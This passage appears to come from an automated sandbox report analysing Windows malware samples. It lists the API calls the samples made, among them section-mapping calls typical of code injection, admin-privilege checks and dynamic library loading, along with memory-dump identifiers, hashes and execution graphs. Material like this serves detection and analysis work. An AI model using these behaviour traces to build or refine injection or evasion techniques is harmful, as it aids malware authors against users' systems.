                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                • Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
                                                • Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                • Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F
                                                Function 004179AD Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LocalAlloc.KERNELBASE(00000000,00417DE5), ref: 004179B5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409153065.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_40b000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: AllocLocal
                                                • String ID:
                                                • API String ID: 3494564517-0
                                                • Opcode ID: 602eef168cce5af4168a3244577f4c42e97a633be8229eb3d624b100d67a8e05
                                                • Instruction ID: 28fb293936c19f60ac03ee1532b02050230a0125afef6b60046f9351569db605
                                                • Opcode Fuzzy Hash: 602eef168cce5af4168a3244577f4c42e97a633be8229eb3d624b100d67a8e05
                                                • Instruction Fuzzy Hash: 8CB012702421008BCB908F50EE047003E60AB08302F438034E204812B0DB700C119B19

                                                Non-executed Functions

                                                Function 00417B5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00417B7B
                                                • Sleep.KERNEL32(00000000), ref: 00417BAA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409153065.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_40b000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterSleepUnhandled
                                                • String ID: -
                                                • API String ID: 2853467449-2547889144
                                                • Opcode ID: 20074c0cef41aae7a696b8d8c8af3f142c4ab85b5304221058387457ac50a666
                                                • Instruction ID: 1948eef14a266f42f26bae57ff7e43f9be2a9bb65bdfdabf3144fb3dff7a339f
                                                • Opcode Fuzzy Hash: 20074c0cef41aae7a696b8d8c8af3f142c4ab85b5304221058387457ac50a666
                                                • Instruction Fuzzy Hash: FB018F31408218BB8B11DF16EC858EE7B78EB89779B11C16DEC149A110C738AE42DF69
                                                Function 004179EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00429FD0), ref: 00417AB6
                                                • GetProcAddress.KERNEL32(00000000,0041C258), ref: 00417AF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409153065.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_40b000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID:
                                                • API String ID: 1646373207-3916222277
                                                • Opcode ID: 5319113c76b06308bf8541d769fd3ad63d1ecba144e285bf0cc76c909ccebf89
                                                • Instruction ID: 94e7802bf3509c972a7c99209e15cc35b9a207eae9f1f7606aeea9668401f719
                                                • Opcode Fuzzy Hash: 5319113c76b06308bf8541d769fd3ad63d1ecba144e285bf0cc76c909ccebf89
                                                • Instruction Fuzzy Hash: 68318F25A9C3C0DAE351C7E4BD45BE23B619B55B04F1580AAD984CB2F1D3FA0945C37E

                                                Execution Graph

                                                Execution Coverage:1.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:23.4%
                                                Total number of Nodes:124
                                                Total number of Limit Nodes:22
                                                execution_graph 31294 7ff7d50c3030 31295 7ff7d50c306d 31294->31295 31297 7ff7d50c32a7 FindCloseChangeNotification 31295->31297 31298 7ff7d50c34f5 31295->31298 31300 7ff7d50c4370 RtlRestoreThreadPreferredUILanguages 31295->31300 31301 7ff7d50e5870 31295->31301 31297->31295 31300->31295 31302 7ff7d50e5890 31301->31302 31303 7ff7d50e5bed RtlRestoreThreadPreferredUILanguages 31302->31303 31304 7ff7d50e5c2f 31302->31304 31303->31302 31304->31295 31305 7ff7d50be430 31312 7ff7d50e5750 31305->31312 31307 7ff7d50be475 31309 7ff7d50bf30c 31307->31309 31316 7ff7d50e5c40 31307->31316 31310 7ff7d50e5870 RtlRestoreThreadPreferredUILanguages 31309->31310 31311 7ff7d50bf31b 31310->31311 31313 7ff7d50e57ac 31312->31313 31314 7ff7d50e5790 RtlAllocateHeap 31313->31314 31315 7ff7d50e57bc 31313->31315 31314->31313 31315->31307 31317 7ff7d50e5c8f 31316->31317 31318 7ff7d50e5c70 RtlAllocateHeap 31317->31318 31319 7ff7d50e5c9f 31317->31319 31318->31317 31319->31307 31423 7ff7d5085c50 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 31465 7ff7d50df5b0 OpenProcessToken 31467 7ff7d50e8ab0 6 API calls 31426 7ff7d5088380 Sleep RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31469 7ff7d508b6a0 11 API calls 31403 7ff7d50664a0 31414 7ff7d50dc230 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31403->31414 31406 7ff7d5069a2a 31407 7ff7d506a0f0 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 31411 7ff7d5066519 31407->31411 31408 7ff7d50e5870 RtlRestoreThreadPreferredUILanguages 31408->31411 31410 7ff7d5067a9b 31410->31411 31420 7ff7d50c2d70 ReadFile 31410->31420 31411->31406 31411->31407 31411->31408 31411->31410 31415 7ff7d5069ac0 RtlAllocateHeap RtlDeleteBoundaryDescriptor 31411->31415 31416 7ff7d50c2ba0 31411->31416 31421 7ff7d5070050 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31411->31421 31414->31411 31415->31411 31417 7ff7d50c2c10 31416->31417 31418 7ff7d50c2bc2 CreateFileW 31417->31418 31419 7ff7d50c2d54 31417->31419 31418->31417 31419->31411 31420->31410 31421->31411 31430 7ff7d5065120 RtlRestoreThreadPreferredUILanguages 31473 7ff7d508b1d0 IsDlgButtonChecked IsDlgButtonChecked IsDlgButtonChecked 31331 7ff7d50e07d0 31333 7ff7d50e0819 31331->31333 31332 7ff7d50e1097 IsDlgButtonChecked 31332->31333 31333->31332 31334 7ff7d50e102b IsDlgButtonChecked 31333->31334 31335 7ff7d50e0bc2 IsDlgButtonChecked 31333->31335 31336 7ff7d50e13b0 31333->31336 31334->31333 31335->31333 31337 7ff7d50e13d0 31338 7ff7d50e141d 31337->31338 31339 7ff7d50e13f0 IsDlgButtonChecked 31338->31339 31340 7ff7d50e142d 31338->31340 31339->31338 31475 7ff7d50dc1d0 RtlAllocateHeap RtlDeleteBoundaryDescriptor 31435 7ff7d5085c50 RtlAllocateHeap 31355 7ff7d5076a50 31362 7ff7d506eb50 31355->31362 31357 7ff7d5076a8e 31358 7ff7d5076fc7 31357->31358 31359 7ff7d50e5870 RtlRestoreThreadPreferredUILanguages 31357->31359 31360 7ff7d5076b13 FindCloseChangeNotification 31357->31360 31361 7ff7d5076f9c CreateMutexExA 31357->31361 31359->31357 31360->31357 31361->31357 31363 7ff7d506eba2 31362->31363 31364 7ff7d506c400 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31363->31364 31365 7ff7d506f1b0 31363->31365 31366 7ff7d50e5750 RtlAllocateHeap 31363->31366 31364->31363 31365->31357 31366->31363 31439 7ff7d5061240 RtlDeleteBoundaryDescriptor 31481 7ff7d5065ac0 16 API calls 31442 7ff7d50d3e70 LoadLibraryW RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31367 7ff7d5074970 31369 7ff7d5074a1c 31367->31369 31368 7ff7d5074a0b SleepEx 31368->31369 31369->31368 31371 7ff7d5074bc4 31369->31371 31372 7ff7d50c2f40 31369->31372 31373 7ff7d50c2f74 31372->31373 31374 7ff7d50c2f60 GetFileAttributesA 31373->31374 31375 7ff7d50c2f84 31373->31375 31374->31373 31375->31369 31380 7ff7d50858dc 31381 7ff7d50858e8 31380->31381 31384 7ff7d5085870 31381->31384 31387 7ff7d508f570 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 31381->31387 31383 7ff7d5085a7d 31388 7ff7d50ab3e0 31383->31388 31387->31383 31389 7ff7d50ab40f 31388->31389 31391 7ff7d5085a9c 31389->31391 31392 7ff7d50e5680 31389->31392 31394 7ff7d50e56a6 31392->31394 31393 7ff7d50e5707 RtlAllocateHeap 31393->31394 31394->31393 31395 7ff7d50e5736 31394->31395 31395->31389 31484 7ff7d5088380 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31320 7ff7d5085d0b 31321 7ff7d5085f49 31320->31321 31324 7ff7d5085c80 31320->31324 31321->31324 31326 7ff7d50dff60 31321->31326 31322 7ff7d50878f6 31324->31322 31330 7ff7d508d030 RtlAllocateHeap 31324->31330 31327 7ff7d50dffa7 31326->31327 31328 7ff7d50e02fe FindWindowW 31327->31328 31329 7ff7d50e04bf 31327->31329 31328->31327 31329->31324 31330->31324 31341 7ff7d50df310 31342 7ff7d50df340 31341->31342 31343 7ff7d50df430 CheckTokenMembership 31342->31343 31344 7ff7d50df4a1 31342->31344 31345 7ff7d50df388 AllocateAndInitializeSid 31342->31345 31343->31342 31345->31342 31454 7ff7d5085870 RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31346 7ff7d507e810 31353 7ff7d507e89c 31346->31353 31347 7ff7d50833eb LoadLibraryA 31347->31353 31348 7ff7d5083648 LoadLibraryA 31348->31353 31349 7ff7d50825e1 LoadLibraryA 31349->31353 31350 7ff7d5082c14 LoadLibraryA 31350->31353 31352 7ff7d5083a9f 31353->31347 31353->31348 31353->31349 31353->31350 31353->31352 31354 7ff7d50dfa00 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31353->31354 31354->31353 31376 7ff7d50a6900 31377 7ff7d50a6923 31376->31377 31378 7ff7d50a6dc5 31377->31378 31379 7ff7d50e5620 RtlDeleteBoundaryDescriptor 31377->31379 31379->31377 31396 7ff7d50888f7 31398 7ff7d50892d0 31396->31398 31400 7ff7d5088380 31396->31400 31397 7ff7d508a52d 31398->31397 31399 7ff7d508930c LoadLibraryW 31398->31399 31398->31400 31399->31400 31401 7ff7d50e5870 RtlRestoreThreadPreferredUILanguages 31400->31401 31402 7ff7d50e5750 RtlAllocateHeap 31400->31402 31401->31400 31402->31400

                                                Executed Functions

                                                Function 00007FF7D507E810 Relevance: 109.0, APIs: 4, Strings: 56, Instructions: 3967COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !@X$!@X$#{j$#{j$29K&$29K&$29K&$5no$5no$GSw'$GSw'$LK@f$LK@f$SQ>$SQ>$SQ>$SQ>$U8PB$U8PB$U8PB$U8PB$U8PB$b~D+$c$&o$c$&o$cpHi$cpHi$c~D+$c~D+$d6M $dfb$dfb$dl!$dl!$e6M $e6M $e6M $g1E$hTw*$hTw*$mF$nF$nF$u|$u|$v'Hu$v'Hu$xl$yl$yl$yl${3\M${F"7$|3\M$|3\M$pcR
                                                • API String ID: 0-1998008778
                                                • Opcode ID: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
                                                • Instruction ID: 6b355c572a4c7d603df944ccb62845f1f8bc54a29c8d72dfa5609e92a1bb8649
                                                • Opcode Fuzzy Hash: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
                                                • Instruction Fuzzy Hash: 1683DA62E096C28BFB786B3498A47FD6791EF44B48FE0443BCF5E4ABD4CE2855808751
                                                Function 00007FF7D50DF310 Relevance: 3.1, APIs: 2, Instructions: 87memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1702 7ff7d50df310-7ff7d50df33e 1703 7ff7d50df360-7ff7d50df366 1702->1703 1704 7ff7d50df420-7ff7d50df426 1703->1704 1705 7ff7d50df36c-7ff7d50df372 1703->1705 1706 7ff7d50df47c-7ff7d50df490 1704->1706 1707 7ff7d50df428-7ff7d50df42e 1704->1707 1708 7ff7d50df374-7ff7d50df37a 1705->1708 1709 7ff7d50df340-7ff7d50df35f 1705->1709 1706->1703 1710 7ff7d50df495-7ff7d50df49b 1707->1710 1711 7ff7d50df430-7ff7d50df465 CheckTokenMembership 1707->1711 1712 7ff7d50df380-7ff7d50df386 1708->1712 1713 7ff7d50df46a-7ff7d50df477 1708->1713 1709->1703 1710->1703 1714 7ff7d50df4a1-7ff7d50df4b5 1710->1714 1711->1703 1712->1703 1716 7ff7d50df388-7ff7d50df40c AllocateAndInitializeSid 1712->1716 1713->1703 1716->1703
                                                APIs
                                                • AllocateAndInitializeSid.KERNELBASE ref: 00007FF7D50DF3E6
                                                • CheckTokenMembership.KERNELBASE(?,?,?,?,?,?,?,?,F4EB9223,?,0645EEAE8F7DAD8E,1063196CE2D18368,?,?,00007FF7D507B07B), ref: 00007FF7D50DF442
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: AllocateCheckInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 1663163955-0
                                                • Opcode ID: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
                                                • Instruction ID: db09a6242a81c5b913b0e56279749ccac36cb96ba976643d71be4e1f6de56bc7
                                                • Opcode Fuzzy Hash: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
                                                • Instruction Fuzzy Hash: 8B31B57250C74197E6348B25F46437EA7A0FB85B40F94403AEE8D46F98EF3CD4488B00
                                                Function 00007FF7D50E07D0 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 589COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1141 7ff7d50e07d0-7ff7d50e0817 1142 7ff7d50e0829-7ff7d50e083b 1141->1142 1143 7ff7d50e08d0-7ff7d50e08d7 1142->1143 1144 7ff7d50e0841-7ff7d50e0848 1142->1144 1147 7ff7d50e09d0-7ff7d50e09d7 1143->1147 1148 7ff7d50e08dd-7ff7d50e08e4 1143->1148 1145 7ff7d50e0940-7ff7d50e0947 1144->1145 1146 7ff7d50e084e-7ff7d50e0855 1144->1146 1149 7ff7d50e094d-7ff7d50e0954 1145->1149 1150 7ff7d50e0b07-7ff7d50e0b0e 1145->1150 1151 7ff7d50e085b-7ff7d50e0862 1146->1151 1152 7ff7d50e0a48-7ff7d50e0a4f 1146->1152 1153 7ff7d50e0b5e-7ff7d50e0b65 1147->1153 1154 7ff7d50e09dd-7ff7d50e09e4 1147->1154 1155 7ff7d50e0a9c-7ff7d50e0aa3 1148->1155 1156 7ff7d50e08ea-7ff7d50e08f1 1148->1156 1157 7ff7d50e0c8f-7ff7d50e0c96 1149->1157 1158 7ff7d50e095a-7ff7d50e0961 1149->1158 1163 7ff7d50e0b14-7ff7d50e0b1b 1150->1163 1164 7ff7d50e0ddd-7ff7d50e0de4 1150->1164 1161 7ff7d50e0ba8-7ff7d50e0baf 1151->1161 1162 7ff7d50e0868-7ff7d50e086f 1151->1162 1171 7ff7d50e0a55-7ff7d50e0a5c 1152->1171 1172 7ff7d50e0d5f-7ff7d50e0d66 1152->1172 1169 7ff7d50e0b6b-7ff7d50e0b72 1153->1169 1170 7ff7d50e0e3a-7ff7d50e0e41 1153->1170 1165 7ff7d50e09ea-7ff7d50e09f1 1154->1165 1166 7ff7d50e0d09-7ff7d50e0d10 1154->1166 1159 7ff7d50e0d8f-7ff7d50e0da3 1155->1159 1160 7ff7d50e0aa9-7ff7d50e0ab0 1155->1160 1167 7ff7d50e0c32-7ff7d50e0c39 1156->1167 1168 7ff7d50e08f7-7ff7d50e08fe 1156->1168 1196 7ff7d50e0c9c-7ff7d50e0caf 1157->1196 1197 7ff7d50e1258-7ff7d50e1287 1157->1197 1190 7ff7d50e0967-7ff7d50e096e 1158->1190 1191 7ff7d50e0f8a-7ff7d50e0fa3 1158->1191 1159->1142 1175 7ff7d50e0da9-7ff7d50e0dbc 1159->1175 1176 7ff7d50e0ab6-7ff7d50e0abd 1160->1176 1177 7ff7d50e1097-7ff7d50e10fb IsDlgButtonChecked 1160->1177 1192 7ff7d50e0bb5-7ff7d50e0bbc 1161->1192 1193 7ff7d50e121f-7ff7d50e1224 1161->1193 1178 7ff7d50e0875-7ff7d50e087c 1162->1178 1179 7ff7d50e0e6a-7ff7d50e0e9d 1162->1179 1182 7ff7d50e0b21-7ff7d50e0b28 1163->1182 1183 7ff7d50e1147-7ff7d50e1151 1163->1183 1180 7ff7d50e1331-7ff7d50e133f 1164->1180 1181 7ff7d50e0dea-7ff7d50e0dfd 1164->1181 1198 7ff7d50e0fd2-7ff7d50e0fee 1165->1198 1199 7ff7d50e09f7-7ff7d50e09fe 1165->1199 1200 7ff7d50e0d16-7ff7d50e0d29 1166->1200 1201 7ff7d50e12a2-7ff7d50e12b0 1166->1201 1194 7ff7d50e0c3f-7ff7d50e0c52 1167->1194 1195 7ff7d50e1229-7ff7d50e1253 1167->1195 1186 7ff7d50e0904-7ff7d50e090b 1168->1186 1187 7ff7d50e0f13-7ff7d50e0f3e 1168->1187 1188 7ff7d50e116b-7ff7d50e1181 1169->1188 1189 7ff7d50e0b78-7ff7d50e0b7f 1169->1189 1184 7ff7d50e138d 1170->1184 1185 7ff7d50e0e47-7ff7d50e0e5a 1170->1185 1202 7ff7d50e100f-7ff7d50e1026 1171->1202 1203 7ff7d50e0a62-7ff7d50e0a69 1171->1203 1173 7ff7d50e1313-7ff7d50e132c 1172->1173 1174 7ff7d50e0d6c-7ff7d50e0d7f 1172->1174 1210 7ff7d50e0820-7ff7d50e0826 1173->1210 1174->1142 1229 7ff7d50e0d85-7ff7d50e0d8a 1174->1229 1175->1142 1230 7ff7d50e0dc2-7ff7d50e0dd8 1175->1230 1208 7ff7d50e0ac3-7ff7d50e0ad6 1176->1208 1209 7ff7d50e110b-7ff7d50e112d 1176->1209 1204 7ff7d50e1101-7ff7d50e1106 1177->1204 1205 7ff7d50e0819-7ff7d50e081b 1177->1205 1231 7ff7d50e0ed3-7ff7d50e0f0e 1178->1231 1232 7ff7d50e0882-7ff7d50e0895 1178->1232 1237 7ff7d50e0ea4-7ff7d50e0ece 1179->1237 1238 7ff7d50e0e9f 1179->1238 1224 7ff7d50e1346-7ff7d50e1388 1180->1224 1225 7ff7d50e1341 1180->1225 1181->1142 1233 7ff7d50e0e03-7ff7d50e0e2d 1181->1233 1214 7ff7d50e1161-7ff7d50e1166 1182->1214 1215 7ff7d50e0b2e-7ff7d50e0b41 1182->1215 1183->1210 1211 7ff7d50e1157-7ff7d50e115c 1183->1211 1223 7ff7d50e1397-7ff7d50e13aa 1184->1223 1185->1142 1234 7ff7d50e0e60 1185->1234 1235 7ff7d50e0911-7ff7d50e0924 1186->1235 1236 7ff7d50e0f4d-7ff7d50e0f71 1186->1236 1239 7ff7d50e0f45-7ff7d50e0f48 1187->1239 1240 7ff7d50e0f40 1187->1240 1212 7ff7d50e1183 1188->1212 1213 7ff7d50e1188-7ff7d50e11d7 1188->1213 1218 7ff7d50e0b85-7ff7d50e0b98 1189->1218 1219 7ff7d50e11dc-7ff7d50e121a 1189->1219 1241 7ff7d50e0974-7ff7d50e0987 1190->1241 1242 7ff7d50e0fa8-7ff7d50e0fcd 1190->1242 1191->1210 1222 7ff7d50e0bc2-7ff7d50e0c27 IsDlgButtonChecked 1192->1222 1192->1223 1193->1210 1194->1142 1226 7ff7d50e0c58-7ff7d50e0c8a 1194->1226 1195->1210 1196->1142 1227 7ff7d50e0cb5-7ff7d50e0cd8 1196->1227 1216 7ff7d50e128f-7ff7d50e129d 1197->1216 1217 7ff7d50e1289 1197->1217 1198->1210 1243 7ff7d50e0a04-7ff7d50e0a17 1199->1243 1244 7ff7d50e0ff3-7ff7d50e100a 1199->1244 1200->1142 1228 7ff7d50e0d2f-7ff7d50e0d5a 1200->1228 1220 7ff7d50e12b2 1201->1220 1221 7ff7d50e12b7-7ff7d50e130e 1201->1221 1202->1210 1206 7ff7d50e0a6f-7ff7d50e0a82 1203->1206 1207 7ff7d50e102b-7ff7d50e108f IsDlgButtonChecked 1203->1207 1204->1205 1205->1210 1206->1142 1245 7ff7d50e0a88-7ff7d50e0a97 1206->1245 1207->1205 1261 7ff7d50e1095 1207->1261 1208->1142 1248 7ff7d50e0adc-7ff7d50e0b02 1208->1248 1246 7ff7d50e1135-7ff7d50e1142 1209->1246 1247 7ff7d50e112f 1209->1247 1210->1142 1211->1210 1212->1213 1213->1142 1214->1210 1215->1142 1249 7ff7d50e0b47-7ff7d50e0b59 1215->1249 1216->1210 1217->1216 1218->1142 1250 7ff7d50e0b9e-7ff7d50e0ba3 1218->1250 1219->1210 1220->1221 1221->1210 1222->1205 1251 7ff7d50e0c2d 1222->1251 1223->1142 1252 7ff7d50e13b0-7ff7d50e13c9 1223->1252 1224->1142 1225->1224 1226->1210 1253 7ff7d50e0cdf-7ff7d50e0d04 1227->1253 1254 7ff7d50e0cda 1227->1254 1228->1210 1229->1210 1230->1210 1231->1210 1232->1142 1255 7ff7d50e0897-7ff7d50e08bf 1232->1255 1233->1170 1234->1179 1235->1142 1256 7ff7d50e092a-7ff7d50e093b 1235->1256 1258 7ff7d50e0f73 1236->1258 1259 7ff7d50e0f79-7ff7d50e0f85 1236->1259 1237->1210 1238->1237 1239->1210 1240->1239 1241->1142 1257 7ff7d50e098d-7ff7d50e09c1 1241->1257 1242->1210 1243->1142 1260 7ff7d50e0a1d-7ff7d50e0a43 1243->1260 1244->1210 1245->1210 1246->1210 1247->1246 1248->1142 1249->1210 1250->1210 1251->1204 1253->1210 1254->1253 1255->1210 1256->1210 1257->1210 1258->1259 1259->1210 1260->1210 1261->1204
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: gFW$gFW$gFW$dT$dT$dT
                                                • API String ID: 0-1908915228
                                                • Opcode ID: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
                                                • Instruction ID: b01aae0de5bff4c73b192edf5b9ef17eb6560e8196513c93e41d5dfe2413deaf
                                                • Opcode Fuzzy Hash: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
                                                • Instruction Fuzzy Hash: 1042A132B0CBC986DA749765F5507AEA6A1E7C9B91FA08137CECD07BA4CE3CD4409B50
                                                Function 00007FF7D50C3030 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 247COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1263 7ff7d50c3030-7ff7d50c306b 1264 7ff7d50c3080-7ff7d50c3085 1263->1264 1265 7ff7d50c3140-7ff7d50c3145 1264->1265 1266 7ff7d50c308b-7ff7d50c3090 1264->1266 1269 7ff7d50c3240-7ff7d50c3245 1265->1269 1270 7ff7d50c314b-7ff7d50c3150 1265->1270 1267 7ff7d50c31e0-7ff7d50c31e5 1266->1267 1268 7ff7d50c3096-7ff7d50c309b 1266->1268 1273 7ff7d50c32f6-7ff7d50c32fb 1267->1273 1274 7ff7d50c31eb-7ff7d50c31f0 1267->1274 1275 7ff7d50c30a1-7ff7d50c30a6 1268->1275 1276 7ff7d50c3286-7ff7d50c328b 1268->1276 1277 7ff7d50c332e-7ff7d50c3333 1269->1277 1278 7ff7d50c324b-7ff7d50c3250 1269->1278 1271 7ff7d50c3156-7ff7d50c315b 1270->1271 1272 7ff7d50c32bd-7ff7d50c32c2 1270->1272 1279 7ff7d50c3161-7ff7d50c3166 1271->1279 1280 7ff7d50c33bb-7ff7d50c33db call 7ff7d50e5870 1271->1280 1287 7ff7d50c32c8-7ff7d50c32cd 1272->1287 1288 7ff7d50c3447-7ff7d50c3458 1272->1288 1291 7ff7d50c3301-7ff7d50c3306 1273->1291 1292 7ff7d50c3474-7ff7d50c3489 1273->1292 1285 7ff7d50c31f6-7ff7d50c31fb 1274->1285 1286 7ff7d50c338c-7ff7d50c3391 1274->1286 1289 7ff7d50c3366-7ff7d50c336b 1275->1289 1290 7ff7d50c30ac-7ff7d50c30b1 1275->1290 1283 7ff7d50c3291-7ff7d50c3296 1276->1283 1284 7ff7d50c3416-7ff7d50c3427 1276->1284 1281 7ff7d50c3339-7ff7d50c333e 1277->1281 1282 7ff7d50c34a8-7ff7d50c34b7 1277->1282 1293 7ff7d50c3256-7ff7d50c325b 1278->1293 1294 7ff7d50c306d-7ff7d50c307f 1278->1294 1295 7ff7d50c33e0-7ff7d50c33f5 1279->1295 1296 7ff7d50c316c-7ff7d50c3171 1279->1296 1280->1264 1297 7ff7d50c3344-7ff7d50c3349 1281->1297 1298 7ff7d50c34cd-7ff7d50c34e5 1281->1298 1310 7ff7d50c34b9 1282->1310 1311 7ff7d50c34be-7ff7d50c34c8 1282->1311 1308 7ff7d50c342c-7ff7d50c3437 1283->1308 1309 7ff7d50c329c-7ff7d50c32a1 1283->1309 1284->1264 1301 7ff7d50c3201-7ff7d50c3206 1285->1301 1302 7ff7d50c33fa-7ff7d50c33ff 1285->1302 1303 7ff7d50c34f7-7ff7d50c34fc 1286->1303 1304 7ff7d50c3397-7ff7d50c33ac 1286->1304 1312 7ff7d50c32d3-7ff7d50c32d8 1287->1312 1313 7ff7d50c345d-7ff7d50c346f 1287->1313 1288->1264 1299 7ff7d50c3371-7ff7d50c3387 1289->1299 1300 7ff7d50c34ea-7ff7d50c34ef 1289->1300 1314 7ff7d50c33b1-7ff7d50c33b6 1290->1314 1315 7ff7d50c30b7-7ff7d50c30bc 1290->1315 1316 7ff7d50c348e-7ff7d50c34a3 1291->1316 1317 7ff7d50c330c-7ff7d50c3311 1291->1317 1292->1264 1306 7ff7d50c3261-7ff7d50c3266 1293->1306 1307 7ff7d50c3404-7ff7d50c3411 1293->1307 1294->1264 1295->1264 1296->1264 1318 7ff7d50c3177-7ff7d50c31c5 1296->1318 1297->1264 1319 7ff7d50c334f-7ff7d50c3361 1297->1319 1298->1264 1299->1264 1300->1264 1327 7ff7d50c34f5 1300->1327 1301->1264 1320 7ff7d50c320c-7ff7d50c3222 call 7ff7d50c4370 1301->1320 1302->1264 1303->1264 1328 7ff7d50c3502 call 7ff7d50e47d0 1303->1328 1304->1264 1306->1264 1322 7ff7d50c326c-7ff7d50c3276 1306->1322 1307->1264 1308->1264 1323 